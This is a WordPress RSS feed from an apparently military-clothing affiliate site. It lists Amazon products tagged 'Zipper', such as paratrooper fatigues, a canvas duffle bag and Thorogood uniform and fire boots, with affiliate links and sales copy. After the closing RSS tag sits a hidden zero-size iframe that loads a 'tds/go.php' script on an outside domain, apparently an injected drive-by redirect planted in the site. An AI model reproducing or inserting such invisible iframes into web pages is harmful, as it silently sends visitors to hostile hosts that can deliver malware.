<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Military uniforms Books &#187; Zipper</title>
	<atom:link href="http://www.sgtwalk.com/tag/zipper/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.sgtwalk.com</link>
	<description>soldiers and retires</description>
	<lastBuildDate>Mon, 23 Jan 2012 09:29:10 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>City Camouflage Vintage Paratrooper Fatigues</title>
		<link>http://www.sgtwalk.com/2009/10/18/city-camouflage-vintage-paratrooper-fatigues/</link>
		<comments>http://www.sgtwalk.com/2009/10/18/city-camouflage-vintage-paratrooper-fatigues/#comments</comments>
		<pubDate>Sun, 18 Oct 2009 10:29:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Clothing]]></category>
		<category><![CDATA[Ball Chain]]></category>
		<category><![CDATA[Button Hole]]></category>
		<category><![CDATA[Camouflage]]></category>
		<category><![CDATA[Cargo Pants]]></category>
		<category><![CDATA[City]]></category>
		<category><![CDATA[Cotton Blend]]></category>
		<category><![CDATA[Dog Tag]]></category>
		<category><![CDATA[Fatigues]]></category>
		<category><![CDATA[Fly]]></category>
		<category><![CDATA[Hang Tag]]></category>
		<category><![CDATA[Paratrooper]]></category>
		<category><![CDATA[Polyester]]></category>
		<category><![CDATA[Red Thread]]></category>
		<category><![CDATA[Tabs]]></category>
		<category><![CDATA[Upc Code]]></category>
		<category><![CDATA[Vintage]]></category>
		<category><![CDATA[Waistband]]></category>
		<category><![CDATA[Youth Of The Nation]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/2009/10/18/city-camouflage-vintage-paratrooper-fatigues/</guid>
		<description><![CDATA[
  City Camouflage Vintage Paratrooper Fatigues &#8211; Made From 55% Cotton / 45% Polyester. Not Just BDU&#8217;s, These Are Cargo Pants With Style For The Youth Of The Nation! Super Soft, Yet Durable, Washed Cotton Blend Twill. Woven 8 Pocket Trouser With Zipper Fly. Cotton Draw String Pull (Ankle Tie). Red Ripping On Inner [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/ULTRA-FORCE-VINTAGE-PARATROOPER-FATIGUES-LARGE/dp/B002C052SQ/ref=sr_1_15/183-9512099-7165239?ie=UTF8&#038;s=apparel&#038;qid=1254616016&#038;sr=8-15?ie=UTF8&#038;tag=sgtwalk-20"><img style="float:left;width: 150px;height:150px;margin-right: 10px;" src="http://ecx.images-amazon.com/images/I/41EVTNSK2GL._AA280_.jpg" alt="City Camouflage Vintage Paratrooper Fatigues" /></a></p>
<p>  City Camouflage Vintage Paratrooper Fatigues &#8211; Made From 55% Cotton / 45% Polyester. Not Just BDU&#8217;s, These Are Cargo Pants With Style For The Youth Of The Nation! Super Soft, Yet Durable, Washed Cotton Blend Twill. Woven 8 Pocket Trouser With Zipper Fly. Cotton Draw String Pull (Ankle Tie). Red Ripping On Inner Waistband and Red Thread on Button Hole. Two Inches Waist Tabs. Washed Out Hang Tag and UPC Code. Ultra Force Embossed Dog Tag Attached With 3.5&#8221; Ball Chain. Urban Camoufla <a href="http://www.amazon.com/ULTRA-FORCE-VINTAGE-PARATROOPER-FATIGUES-LARGE/dp/B002C052SQ/ref=sr_1_15/183-9512099-7165239?ie=UTF8&#038;s=apparel&#038;qid=1254616016&#038;sr=8-15?ie=UTF8&#038;tag=sgtwalk-20" title="More at Amazon">(more&#8230;)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/10/18/city-camouflage-vintage-paratrooper-fatigues/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Side Zipper Canvas Duffle Bag, Large &#8211; Available in Various Colors and Sizes</title>
		<link>http://www.sgtwalk.com/2009/10/15/side-zipper-canvas-duffle-bag-large-available-in-various-colors-and-sizes/</link>
		<comments>http://www.sgtwalk.com/2009/10/15/side-zipper-canvas-duffle-bag-large-available-in-various-colors-and-sizes/#comments</comments>
		<pubDate>Thu, 15 Oct 2009 23:51:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Uniforms]]></category>
		<category><![CDATA[Available]]></category>
		<category><![CDATA[Canvas]]></category>
		<category><![CDATA[Canvas Bag]]></category>
		<category><![CDATA[Canvas Duffle Bag]]></category>
		<category><![CDATA[Colors]]></category>
		<category><![CDATA[Cotton Canvas]]></category>
		<category><![CDATA[Duffle]]></category>
		<category><![CDATA[Grab]]></category>
		<category><![CDATA[Heavyweight Cotton]]></category>
		<category><![CDATA[Large]]></category>
		<category><![CDATA[Side]]></category>
		<category><![CDATA[Side Zipper]]></category>
		<category><![CDATA[Sizes]]></category>
		<category><![CDATA[Various]]></category>
		<category><![CDATA[Zipper]]></category>
		<category><![CDATA[Zipper Bag]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/2009/10/15/side-zipper-canvas-duffle-bag-large-available-in-various-colors-and-sizes/</guid>
		<description><![CDATA[
  Heavyweight cotton canvas duffle bag, double reinforced top and side grab handles, D-rings.
   (more&#8230;)
]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/3478-OLIVE-ZIPPER-CANVAS-DUFFLE/dp/B00029R86I/ref=sr_1_12/189-6152661-1031859?ie=UTF8&#038;s=apparel&#038;qid=1254616123&#038;sr=8-12?ie=UTF8&#038;tag=sgtwalk-20"><img style="float:left;width: 150px;height:150px;margin-right: 10px;" src="http://ecx.images-amazon.com/images/I/11Y9LpzKoaL._AA280_.jpg" alt="Side Zipper Canvas Duffle Bag, Large - Available in Various Colors and Sizes" /></a></p>
<p>  Heavyweight cotton canvas duffle bag, double reinforced top and side grab handles, D-rings.</p>
<p>   <a href="http://www.amazon.com/3478-OLIVE-ZIPPER-CANVAS-DUFFLE/dp/B00029R86I/ref=sr_1_12/189-6152661-1031859?ie=UTF8&#038;s=apparel&#038;qid=1254616123&#038;sr=8-12?ie=UTF8&#038;tag=sgtwalk-20" title="More at Amazon">(more&#8230;)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/10/15/side-zipper-canvas-duffle-bag-large-available-in-various-colors-and-sizes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Teflon Coated Black Deluxe E M T  Pants</title>
		<link>http://www.sgtwalk.com/2009/08/02/teflon-coated-black-deluxe-e-m-t-pants/</link>
		<comments>http://www.sgtwalk.com/2009/08/02/teflon-coated-black-deluxe-e-m-t-pants/#comments</comments>
		<pubDate>Sun, 02 Aug 2009 16:48:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Uniforms]]></category>
		<category><![CDATA[Adjustable Waist Tabs]]></category>
		<category><![CDATA[Bottoms]]></category>
		<category><![CDATA[Dupont]]></category>
		<category><![CDATA[Dupont Teflon]]></category>
		<category><![CDATA[Flashlights]]></category>
		<category><![CDATA[Fly]]></category>
		<category><![CDATA[Pockets]]></category>
		<category><![CDATA[Poly Cotton]]></category>
		<category><![CDATA[Scissors]]></category>
		<category><![CDATA[Velcro Closures]]></category>
		<category><![CDATA[Water Stains]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/1142/teflon-coated-black-deluxe-e-m-t-pants/</guid>
		<description><![CDATA[Teflon Coated Black Deluxe E M T  Pants


	            
                          These specially designed EMT pants feature DuPont Teflon coated [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/dp/B0002CDYDG/?tag=militarypol-20"><b>Teflon Coated Black Deluxe E M T  Pants</b></a></p>
<p><a href="http://www.amazon.com/dp/B0002CDYDG/?tag=militarypol-20"><br />
<img src="http://ecx.images-amazon.com/images/I/31VS7HNN4HL._SL75_.jpg" style="float:left; margin-top:0px; margin-bottom:0px; padding: 1m 2em;" /><br />
	            </a><br />
                          These specially designed EMT pants feature DuPont Teflon coated 65/35 poly/cotton twill to repel water, stains and body fluid. The pants also feature 9 pockets for tools, flashlights, etc. There are snap looped slot pockets for scissors, Velcro closures and adjustable waist tabs and drawstring bottoms. Pants come with a zipper fly. Available in regular and long lengths. </p>
</p>
<p>	  <a href="http://www.amazon.com/dp/B0002CDYDG/?tag=militarypol-20">Buy/More Info</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/08/02/teflon-coated-black-deluxe-e-m-t-pants/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Black Diamond Quilted Vest</title>
		<link>http://www.sgtwalk.com/2009/07/28/black-diamond-quilted-vest/</link>
		<comments>http://www.sgtwalk.com/2009/07/28/black-diamond-quilted-vest/#comments</comments>
		<pubDate>Tue, 28 Jul 2009 12:00:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Clothing]]></category>
		<category><![CDATA[8oz]]></category>
		<category><![CDATA[Black Diamond]]></category>
		<category><![CDATA[Black Vest]]></category>
		<category><![CDATA[Diamond Black]]></category>
		<category><![CDATA[Insulation Material]]></category>
		<category><![CDATA[Nylon]]></category>
		<category><![CDATA[Outer Shell]]></category>
		<category><![CDATA[Pockets]]></category>
		<category><![CDATA[Quilted Vest]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/512/black-diamond-quilted-vest/</guid>
		<description><![CDATA[Black Diamond Quilted Vest


	            
                          This new black diamond quilted vest is designed to be extra warm and comfortable. [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/dp/B000BAQTBI/?tag=militarypol-20"><b>Black Diamond Quilted Vest</b></a></p>
<p><a href="http://www.amazon.com/dp/B000BAQTBI/?tag=militarypol-20"><br />
<img src="http://ecx.images-amazon.com/images/I/318R4X02E2L._SL75_.jpg" style="float:left; margin-top:0px; margin-bottom:0px; padding: 1m 2em;" /><br />
	            </a><br />
                          This new black diamond quilted vest is designed to be extra warm and comfortable. The outer shell is made of 100% nylon with a matching color knit lining. Features a knit collar, 2 front lined pockets and a front zipper. The vest is insulated with 8oz. of our best insulation material. </p>
</p>
<p>	  <a href="http://www.amazon.com/dp/B000BAQTBI/?tag=militarypol-20">Buy/More Info</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/07/28/black-diamond-quilted-vest/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Olive Poly   Cotton Twill BDU Pants</title>
		<link>http://www.sgtwalk.com/2009/07/26/olive-poly-cotton-twill-bdu-pants-2/</link>
		<comments>http://www.sgtwalk.com/2009/07/26/olive-poly-cotton-twill-bdu-pants-2/#comments</comments>
		<pubDate>Sun, 26 Jul 2009 22:53:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Uniforms]]></category>
		<category><![CDATA[Adjustable Waist Tabs]]></category>
		<category><![CDATA[Bdu Pants]]></category>
		<category><![CDATA[Bdus]]></category>
		<category><![CDATA[Cotton Pants]]></category>
		<category><![CDATA[Cotton Twill]]></category>
		<category><![CDATA[Fly]]></category>
		<category><![CDATA[Inseam]]></category>
		<category><![CDATA[Knees]]></category>
		<category><![CDATA[Nylon]]></category>
		<category><![CDATA[Pockets]]></category>
		<category><![CDATA[Poly Cotton]]></category>
		<category><![CDATA[Propper]]></category>
		<category><![CDATA[Seam]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/1132/olive-poly-cotton-twill-bdu-pants-2/</guid>
		<description><![CDATA[Olive Poly   Cotton Twill BDU Pants


	            
                          Genuine Gear BDUs are manufactured to the same standards as [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/dp/B001EJ71QM/?tag=militarypol-20"><b>Olive Poly   Cotton Twill BDU Pants</b></a></p>
<p><a href="http://www.amazon.com/dp/B001EJ71QM/?tag=militarypol-20"><br />
<img src="http://ecx.images-amazon.com/images/I/31bMpyHflgL._SL75_.jpg" style="float:left; margin-top:0px; margin-bottom:0px; padding: 1m 2em;" /><br />
	            </a><br />
                          Genuine Gear BDUs are manufactured to the same standards as Propper&#8217;s regular BDUs and are available at a lower price. These BDUs feature a zipper fly, six pockets (four with button flaps), double reinforced seat and knees, adjustable waist tabs, nylon drawstring leg closures and felled outseam, inseam and seat seam. </p>
</p>
<p>	  <a href="http://www.amazon.com/dp/B001EJ71QM/?tag=militarypol-20">Buy/More Info</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/07/26/olive-poly-cotton-twill-bdu-pants-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CAP100 Jedi Warrior Boots</title>
		<link>http://www.sgtwalk.com/2009/07/15/cap100-jedi-warrior-boots/</link>
		<comments>http://www.sgtwalk.com/2009/07/15/cap100-jedi-warrior-boots/#comments</comments>
		<pubDate>Thu, 16 Jul 2009 04:43:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Boots]]></category>
		<category><![CDATA[Brown Fabric]]></category>
		<category><![CDATA[Brown Leather]]></category>
		<category><![CDATA[Foot Pad]]></category>
		<category><![CDATA[Heavy Duty]]></category>
		<category><![CDATA[Jedi]]></category>
		<category><![CDATA[Mens Boots]]></category>
		<category><![CDATA[Mens Shoes]]></category>
		<category><![CDATA[Quality Rubber]]></category>
		<category><![CDATA[Rubber Soles]]></category>
		<category><![CDATA[Size 13]]></category>
		<category><![CDATA[Size 9]]></category>
		<category><![CDATA[Upholstery]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/191/cap100-jedi-warrior-boots/</guid>
		<description><![CDATA[CAP100 Jedi Warrior Boots


	            
                          Our mens boots &#038; shoes are only made in the following sizes:
Small which covers [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/dp/B0021290Z6/?tag=militarypol-20"><b>CAP100 Jedi Warrior Boots</b></a></p>
<p><a href="http://www.amazon.com/dp/B0021290Z6/?tag=militarypol-20"><br />
<img src="http://ecx.images-amazon.com/images/I/31azV%2By0ncL._SL75_.jpg" style="float:left; margin-top:0px; margin-bottom:0px; padding: 1m 2em;" /><br />
	            </a><br />
                          Our mens boots &#038; shoes are only made in the following sizes:<br />
Small which covers size 8-9, medium which covers sizes 10-11,<br />
large which covers sizes 12-13 and extra large which is a size 14.<br />
Works great for Jedi, Military and a host of others.<br />
Heavy duty side calf zipper. Inside is lined with durable upholstery-like brown fabric and comfortable foot pad.<br />
Extra large boot is size 14 and has 19 inch calf, boot is 19 inches high,<br />
inside calf zipper is 17 inches.<br />
Large boot is size 13 and has 18 1/2 inch calf, boot is 18 inches high,<br />
inside calf zipper is 16 1/2 inches.<br />
Medium boot is size 11 and has 18 inch calf, boot is 17 1/2 inches high,<br />
inside calf zipper is 15 1/2 inches.<br />
Small boot is size 9 and has 17 1/2 inch calf, boot is 17 inches high,<br />
inside calf zipper is 15 inches.<br />
Very good quality imitation brown leather with fabric lining and padded foot insert. Quality rubber soles and heels. </p>
</p>
<p>	  <a href="http://www.amazon.com/dp/B0021290Z6/?tag=militarypol-20">Buy/More Info</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/07/15/cap100-jedi-warrior-boots/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mens Thorogood  8  Front Zip Uniform Boots</title>
		<link>http://www.sgtwalk.com/2009/07/14/mens-thorogood-8-front-zip-uniform-boots/</link>
		<comments>http://www.sgtwalk.com/2009/07/14/mens-thorogood-8-front-zip-uniform-boots/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 04:53:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Boots]]></category>
		<category><![CDATA[Ankle Support]]></category>
		<category><![CDATA[Beauties]]></category>
		<category><![CDATA[Boots Leather]]></category>
		<category><![CDATA[Fiberglass]]></category>
		<category><![CDATA[Goodyear]]></category>
		<category><![CDATA[Goodyear Welt Construction]]></category>
		<category><![CDATA[Heavy Duty]]></category>
		<category><![CDATA[Insoles]]></category>
		<category><![CDATA[Lace]]></category>
		<category><![CDATA[Mens Boots]]></category>
		<category><![CDATA[Polyester]]></category>
		<category><![CDATA[S Postal Service]]></category>
		<category><![CDATA[Slip Resistance]]></category>
		<category><![CDATA[Thorogood Boots]]></category>
		<category><![CDATA[Time Of Year]]></category>
		<category><![CDATA[U S Postal Service]]></category>
		<category><![CDATA[Uniform Boots]]></category>
		<category><![CDATA[Wear And Tear]]></category>
		<category><![CDATA[Weave]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/190/mens-thorogood-8-front-zip-uniform-boots/</guid>
		<description><![CDATA[Mens Thorogood  8  Front Zip Uniform Boots


	            
                          High &#8211; shine leather, unparallel support and removable Poly [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/dp/B001Y8YO4K/?tag=militarypol-20"><b>Mens Thorogood  8  Front Zip Uniform Boots</b></a></p>
<p><a href="http://www.amazon.com/dp/B001Y8YO4K/?tag=militarypol-20"><br />
<img src="http://ecx.images-amazon.com/images/I/51q9zZlWtGL._SL75_.jpg" style="float:left; margin-top:0px; margin-bottom:0px; padding: 1m 2em;" /><br />
	            </a><br />
                          High &#8211; shine leather, unparallel support and removable Poly &#8211; Pillow Footpacer insole make Men&#8217;s Thorogood 8&#8243; Front Zip Uniform Boots the choice for marching through your work day! American-made support and protection for hard workin&#8217; feet! These beauties have it all for the blue-collar soldier on the grind: shock-absorbing Poly-Pillow Footpacer insole, fortified ankle support, slip resistance and American-made quality that can&#8217;t be beat! Oh, and if that&#8217;s not enough, they&#8217;re certified by the U.S. Postal Service, a group that knows a thing or two about being on your feet all day. Look sharp. Pay less: Combo high-shine leather and full-grain padded leather quarter; Goodyear welt construction lets you repair wear and tear way, way, waaaay down the road; Poly-Pillow Footpacer insoles are made with a polyester lining that wicks away moisture, giving you drier, cooler and healthier feet, no matter what time of year; Comfort weave lining for breathability; Lightweight; Supportive fiberglass shank; Lace-in heavy-duty YKK zipper; Rubber midsole. 30 ozs. each. Made in the USA. Black. State Size. Guarantee every &#8220;foot forward&#8221; is your best one. Order Today! Men&#8217;s Thorogood 8&#8243; Front Zip Uniform Boots </p>
</p>
<p>	  <a href="http://www.amazon.com/dp/B001Y8YO4K/?tag=militarypol-20">Buy/More Info</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/07/14/mens-thorogood-8-front-zip-uniform-boots/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mens Thorogood  10  Wildland Fire Boots with Removable Zipper</title>
		<link>http://www.sgtwalk.com/2009/07/14/mens-thorogood-10-wildland-fire-boots-with-removable-zipper/</link>
		<comments>http://www.sgtwalk.com/2009/07/14/mens-thorogood-10-wildland-fire-boots-with-removable-zipper/#comments</comments>
		<pubDate>Tue, 14 Jul 2009 12:04:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Boots]]></category>
		<category><![CDATA[Bravery]]></category>
		<category><![CDATA[Dri]]></category>
		<category><![CDATA[Fire Boots]]></category>
		<category><![CDATA[Fire Fight]]></category>
		<category><![CDATA[Goodyear]]></category>
		<category><![CDATA[Insoles]]></category>
		<category><![CDATA[Lace]]></category>
		<category><![CDATA[Ladder]]></category>
		<category><![CDATA[Leather Uppers]]></category>
		<category><![CDATA[Lex]]></category>
		<category><![CDATA[Mens Boots]]></category>
		<category><![CDATA[Moisture Wicking]]></category>
		<category><![CDATA[Oiled Leather]]></category>
		<category><![CDATA[Protective Clothing]]></category>
		<category><![CDATA[Shark Skin]]></category>
		<category><![CDATA[Thorogood Boots]]></category>
		<category><![CDATA[Vamp]]></category>
		<category><![CDATA[Wear And Tear]]></category>
		<category><![CDATA[Weave]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/189/mens-thorogood-10-wildland-fire-boots-with-removable-zipper/</guid>
		<description><![CDATA[Mens Thorogood  10  Wildland Fire Boots with Removable Zipper


	            
                          U.S.A. &#8211; made Men&#8217;s Thorogood 10&#8243; Wildland [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/dp/B001PHBJK2/?tag=militarypol-20"><b>Mens Thorogood  10  Wildland Fire Boots with Removable Zipper</b></a></p>
<p><a href="http://www.amazon.com/dp/B001PHBJK2/?tag=militarypol-20"><br />
<img src="http://ecx.images-amazon.com/images/I/31MZAxxdb5L._SL75_.jpg" style="float:left; margin-top:0px; margin-bottom:0px; padding: 1m 2em;" /><br />
	            </a><br />
                          U.S.A. &#8211; made Men&#8217;s Thorogood 10&#8243; Wildland Fire Boots with Removable Zipper are built tough to take the HEAT! In the heat of a nasty fire fight, bravery alone won&#8217;t get the job done. You need the right equipment, too. They meet all the requirements of NFPA Protective Clothing and Equipment while also meeting and surpassing your requirements for comfort! Fearless Footwear: Flame- and cut-resistant black oiled leather uppers with scuff-resisting &#8220;shark-skin&#8221; leather toe and heal counter and removable lace-in zipper for added protection; Goodyear storm welt construction lets you repair wear and tear way, way, waaaay down the road; Removable felt insoles; Dri-Lex tongue and comfort weave vamp lining for moisture-wicking performance; Thorogood Vibram FIRE sole for heat-resisting protection; Rubber and leather midsole; Supportive steel triple ladder shank; 38 ozs. each. Made in the USA. Black. State Size. Order Today! Men&#8217;s Thorogood 10&#8243; Wildland Fire Boots with Removable Zipper </p>
</p>
<p>	  <a href="http://www.amazon.com/dp/B001PHBJK2/?tag=militarypol-20">Buy/More Info</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/07/14/mens-thorogood-10-wildland-fire-boots-with-removable-zipper/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Boot Zippers</title>
		<link>http://www.sgtwalk.com/2009/07/12/boot-zippers/</link>
		<comments>http://www.sgtwalk.com/2009/07/12/boot-zippers/#comments</comments>
		<pubDate>Sun, 12 Jul 2009 22:51:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Boots]]></category>
		<category><![CDATA[Combat Boots]]></category>
		<category><![CDATA[Combat Style]]></category>
		<category><![CDATA[Style Boots]]></category>
		<category><![CDATA[Time Saver]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/187/boot-zippers/</guid>
		<description><![CDATA[Boot Zippers


	            
                          Time saver, A must for combat boots. The Zipper fits most combat style boots. Made of [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/dp/B000E78WU4/?tag=militarypol-20"><b>Boot Zippers</b></a></p>
<p><a href="http://www.amazon.com/dp/B000E78WU4/?tag=militarypol-20"><br />
<img src="http://ecx.images-amazon.com/images/I/319YRRAXZDL._SL75_.jpg" style="float:left; margin-top:0px; margin-bottom:0px; padding: 1m 2em;" /><br />
	            </a><br />
                          Time saver, A must for combat boots. The Zipper fits most combat style boots. Made of leather. </p>
</p>
<p>	  <a href="http://www.amazon.com/dp/B000E78WU4/?tag=militarypol-20">Buy/More Info</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/07/12/boot-zippers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mens Thorogood  8  Front Zip Oblique Toe Station Boots</title>
		<link>http://www.sgtwalk.com/2009/07/12/mens-thorogood-8-front-zip-oblique-toe-station-boots/</link>
		<comments>http://www.sgtwalk.com/2009/07/12/mens-thorogood-8-front-zip-oblique-toe-station-boots/#comments</comments>
		<pubDate>Sun, 12 Jul 2009 15:32:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Military Boots]]></category>
		<category><![CDATA[Ankle Support]]></category>
		<category><![CDATA[Beauties]]></category>
		<category><![CDATA[Electric Shock]]></category>
		<category><![CDATA[Fiberglass]]></category>
		<category><![CDATA[Goodyear]]></category>
		<category><![CDATA[Goodyear Welt Construction]]></category>
		<category><![CDATA[Heavy Duty]]></category>
		<category><![CDATA[Insoles]]></category>
		<category><![CDATA[Lace]]></category>
		<category><![CDATA[Lugs]]></category>
		<category><![CDATA[Moisture Wicking]]></category>
		<category><![CDATA[Oil Heat]]></category>
		<category><![CDATA[Outsoles]]></category>
		<category><![CDATA[Performance Oil]]></category>
		<category><![CDATA[Slip Resistance]]></category>
		<category><![CDATA[Steel Toe]]></category>
		<category><![CDATA[Time Of Year]]></category>
		<category><![CDATA[Wear And Tear]]></category>
		<category><![CDATA[Weave]]></category>
		<category><![CDATA[Zipper]]></category>

		<guid isPermaLink="false">http://www.sgtwalk.com/186/mens-thorogood-8-front-zip-oblique-toe-station-boots/</guid>
		<description><![CDATA[Mens Thorogood  8  Front Zip Oblique Toe Station Boots


	            
                          High &#8211; shine leather, steel toe and [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><a href="http://www.amazon.com/dp/B001Y8Q15A/?tag=militarypol-20"><b>Mens Thorogood  8  Front Zip Oblique Toe Station Boots</b></a></p>
<p><a href="http://www.amazon.com/dp/B001Y8Q15A/?tag=militarypol-20"><br />
<img src="http://ecx.images-amazon.com/images/I/51QNgq-05gL._SL75_.jpg" style="float:left; margin-top:0px; margin-bottom:0px; padding: 1m 2em;" /><br />
	            </a><br />
                          High &#8211; shine leather, steel toe and removable Poly &#8211; Pillow Footpacer insole make Men&#8217;s Thorogood 8&#8243; Front Zip Oblique Toe Station Boots the choice for marching through your work day! American-made support and protection for hard workin&#8217; feet! These beauties have it all for the blue-collar soldier on the grind: shock-absorbing Poly-Pillow Footpacer insole, fortified ankle support, steel toe protection, electric shock / puncture / slip resistance and American-made quality that can&#8217;t be beat! Look sharp. Pay less: Combo high-shine leather and full-grain padded leather quarter; Goodyear welt construction lets you repair wear and tear way, way, waaaay down the road; Poly-Pillow Footpacer insoles are made with a polyester lining that wicks away moisture, giving you drier, cooler and healthier feet, no matter what time of year; Comfort weave lining for breathability and moisture-wicking performance; Oil, heat and slip-resistant Vibram Security outsoles with heavy-duty lugs&#8230; non-marking, too; Supportive fiberglass shank; Lace-in heavy-duty YKK zipper; Rubber midsole. 30 ozs. each. Made in the USA. Black.; State Size. Guarantee every &#8220;foot forward&#8221; is your best one. Order Today! Men&#8217;s Thorogood 8&#8243; Front Zip Oblique Toe Station Boots </p>
</p>
<p>	  <a href="http://www.amazon.com/dp/B001Y8Q15A/?tag=militarypol-20">Buy/More Info</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sgtwalk.com/2009/07/12/mens-thorogood-8-front-zip-oblique-toe-station-boots/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe><!-- WP Super Cache is installed but broken. The path to wp-cache-phase1.php in wp-content/advanced-cache.php must be fixed! -->
